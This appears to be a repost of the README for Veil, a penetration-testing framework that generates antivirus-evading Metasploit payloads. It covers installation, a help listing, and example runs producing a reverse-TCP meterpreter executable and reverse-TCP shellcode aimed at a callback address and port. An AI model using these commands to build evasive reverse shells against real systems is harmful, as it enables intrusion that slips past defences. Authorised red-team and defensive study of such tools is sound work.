Veil - Tool To Generate Metasploit Payloads That Bypass Common Anti-Virus Solutions


Veil is a tool designed to generate Metasploit payloads that bypass common anti-virus solutions.
Veil is currently under support by @ChrisTruncer.

Software Requirements:
The following OSs are officially supported:
  • Debian 8+
  • Kali Linux Rolling 2018.1+
The following OSs are likely able to run Veil:
  • Arch Linux
  • BlackArch Linux
  • Deepin 15+
  • Elementary
  • Fedora 22+
  • Linux Mint
  • Parrot Security
  • Ubuntu 15.10+

Setup

Kali's Quick Install
    apt -y install veil
    /usr/share/veil/config/setup.sh --force --silent

Git's Quick Install
NOTE:
  • Installation must be done with superuser privileges. If you are not using the root account (as default with Kali Linux), prepend commands with sudo or change to the root user before beginning.
  • Your package manager may be different to apt.

    sudo apt-get -y install git
    git clone https://github.com/Veil-Framework/Veil.git
    cd Veil/
    ./config/setup.sh --force --silent

./config/setup.sh // Setup Files
This file is responsible for installing all the dependencies of Veil. This includes all the WINE environment, for the Windows side of things. It will install all the necessary Linux packages and GoLang, as well as Python, Ruby and AutoIT for Windows. In addition, it will also run ./config/update-config.py for your environment.
It includes two optional flags, --force and --silent:
    --force    If something goes wrong, this will overwrite detecting any previous installs. Useful when there is a setup package update.
    --silent   This will perform an unattended installation of everything, as it will automate all the steps, so there is no interaction for the user.
This can be run either by doing: ./Veil.py --setup OR ./config/setup.sh --force.

./config/update-config.py // Regenerating Configuration file
This will generate the output file for /etc/veil/settings.py. Most of the time it will not need to be rebuilt, but in some cases you might be prompted to do so (such as a major Veil update).
It is important that you are in the ./config/ directory before executing update-config.py. If you are not, /etc/veil/settings.py will be incorrect and when you launch Veil you will see the following:
    Main Menu              0 payloads loaded
Don't panic. Run either: ./Veil.py --config OR cd ./config/; ./update-config.py.

Py2Exe
NOTE: Using Py2Exe is recommended over PyInstaller (as it has a lower detection rate).
MANUALLY Install on a Windows Computer (as this isn't done by Veil's setup):

Example Usage
Veil's Main Menu:
    $ ./Veil.py
    ===============================================================================
                                 Veil | [Version]: 3.1.6
    ===============================================================================
          [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

    Main Menu

      2 tools loaded

    Available Tools:

      1)  Evasion
      2)  Ordnance

    Available Commands:

      exit        Completely exit Veil
      info        Information on a specific tool
      list        List available tools
      options     Show Veil configuration
      update      Update Veil
      use         Use a specific tool

    Veil>:

Help
    $ ./Veil.py --help
    usage: Veil.py [--list-tools] [-t TOOL] [--update] [--setup] [--config]
                   [--version] [--ip IP] [--port PORT] [--list-payloads]
                   [-p [PAYLOAD]] [-o OUTPUT-NAME]
                   [-c [OPTION=value [OPTION=value ...]]]
                   [--msfoptions [OPTION=value [OPTION=value ...]]] [--msfvenom ]
                   [--compiler pyinstaller] [--clean] [--ordnance-payload PAYLOAD]
                   [--list-encoders] [-e ENCODER] [-b \x00\x0a..] [--print-stats]

    Veil is a framework containing multiple tools.

    [*] Veil Options:
      --list-tools          List Veil's tools
      -t TOOL, --tool TOOL  Specify Veil tool to use (Evasion, Ordnance etc.)
      --update              Update the Veil framework
      --setup               Run the Veil framework setup file & regenerate the
                            configuration
      --config              Regenerate the Veil framework configuration file
      --version             Displays version and quits

    [*] Callback Settings:
      --ip IP, --domain IP  IP address to connect back to
      --port PORT           Port number to connect to

    [*] Payload Settings:
      --list-payloads       Lists all available payloads for that tool

    [*] Veil-Evasion Options:
      -p [PAYLOAD]          Payload to generate
      -o OUTPUT-NAME        Output file base name for source and compiled binaries
      -c [OPTION=value [OPTION=value ...]]
                            Custom payload module options
      --msfoptions [OPTION=value [OPTION=value ...]]
                            Options for the specified metasploit payload
      --msfvenom []         Metasploit shellcode to generate (e.g.
                            windows/meterpreter/reverse_tcp etc.)
      --compiler pyinstaller
                            Compiler choice for payload (currently only needed for
                            Python)
      --clean               Clean out payload folders

    [*] Veil-Ordnance Shellcode Options:
      --ordnance-payload PAYLOAD
                            Payload type (bind_tcp, rev_tcp, etc.)

    [*] Veil-Ordnance Encoder Options:
      --list-encoders       Lists all available encoders
      -e ENCODER, --encoder ENCODER
                            Name of shellcode encoder to use
      -b \x00\x0a.., --bad-chars \x00\x0a..
                            Bad characters to avoid
      --print-stats         Print information about the encoded shellcode
    $

Veil Evasion CLI
    $ ./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py --ip 127.0.0.1 --port 4444
    ===============================================================================
                                       Veil-Evasion
    ===============================================================================
          [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

    runtime/internal/sys
    runtime/internal/atomic
    runtime
    errors
    internal/race
    sync/atomic
    math
    sync
    io
    unicode/utf8
    internal/syscall/windows/sysdll
    unicode/utf16
    syscall
    strconv
    reflect
    encoding/binary
    command-line-arguments
    ===============================================================================
                                       Veil-Evasion
    ===============================================================================
          [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

     [*] Language: go
     [*] Payload Module: go/meterpreter/rev_tcp
     [*] Executable written to: /var/lib/veil/output/compiled/payload.exe
     [*] Source code written to: /var/lib/veil/output/source/payload.go
     [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/payload.rc
    $
    $ file /var/lib/veil/output/compiled/payload.exe
    /var/lib/veil/output/compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
    $

Veil Ordnance CLI
    $ ./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 127.0.0.1 --port 4444
    ===============================================================================
                                       Veil-Ordnance
    ===============================================================================
          [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

     [*] Payload Name: Reverse TCP Stager (Stage 1)
     [*] IP Address: 127.0.0.1
     [*] Port: 4444
     [*] Shellcode Size: 287

    [\x-escaped shellcode string, 287 bytes]
    $